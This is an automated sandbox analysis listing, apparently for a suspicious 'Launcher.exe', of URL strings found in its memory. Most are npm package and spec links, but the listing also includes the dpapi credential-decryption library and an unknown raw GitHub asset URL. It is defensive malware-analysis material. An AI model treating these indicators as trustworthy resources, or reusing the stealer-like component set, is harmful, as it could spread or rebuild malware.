        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.git
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.gitA
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild/issues/174)
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readme
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readmea
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi.git
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi.gitA
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi.githHP
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyneo)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit#downloads
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit).
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit/wiki/Using-Node-modules)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/nw-gyp)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.git
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.gitA
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl:
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ry)
        Source: Launcher.exe, 00000000.00000003.1533437253.00000175264DC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1533437253.000001752644B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/shellac
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/RubenVerborgh
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/isaacs
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/springmeyer)
        Source: Launcher.exe, 00000000.00000003.1557876754.00000175264EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sql-js/sql.js/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sqlcipher/sqlcipher)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
        Source: Launcher.exe, 00000000.00000003.1420602815.00000105F8500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tlrobinson/long-stack-traces
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tmcw)
        Source: Launcher.exe, 00000000.00000003.1542759857.0000017526156000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/raw/master/LICENSE).
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/tarball/master
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Control-Flow)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Debugging)
        Source: Launcher.exe, 00000000.00000003.1209423627.0000017525D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg/issues/1589
        Source: Launcher.exe, 00000000.00000003.1314370569.00000175265E0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1314370569.0000017526600000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/webpack/webpack/issues/4175#issuecomment-342931035
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/willwhite)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yarnpkg/yarn)
        Source: Launcher.exe, 00000000.00000003.1248030209.00000175261F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1307740753.0000017526504000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1296139106.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1248030209.0000017526205000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1392827074.000000426BF01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1300104935.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280811807.00000175263C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yetingli
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526247000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yqnn/node-readdir-glob#options
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v3-green.svg)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v6-green.svg)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/github/release/TryGhost/node-sqlite3.svg)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278730215.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752612D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jquery.org/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1277593652.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/icon.svg
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278730215.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752612D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/license
        Source: Launcher.exe, 00000000.00000003.1397530605.00000175262C8000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1350482331.0000017529435000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342373897.0000017526023000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/)
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
        Source: Launcher.exe, 00000000.00000003.1323720251.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310888871.000001752628B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/ap
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
        Source: Launcher.exe, 00000000.00000003.1350244725.0000012E103C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232339928.0000017526069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/http.html#http_message_headers
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html#node-api-version-matrix)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/n-api.html)
        Source: Launcher.exe, 00000000.00000003.1323720251.0000017526287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/zlib.html#zlib
        Source: Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.0000017526283000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/zlib.html#zlib_class_options
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/latest/docs/api/n-api.html#n_api_n_api)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0-headers.tar.gz
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gz
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/node-v18.5.0.tar.gzhttps://nodejs.org/download/release/v
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/download/release/v18.5.0/win-x64/node.lib
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/~jpommerening
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
        Source: Launcher.exe, 00000000.00000003.1227628748.000001752610E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/underagechilderen/duck/main/ducklogo.png
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://registry.npmjs.org/
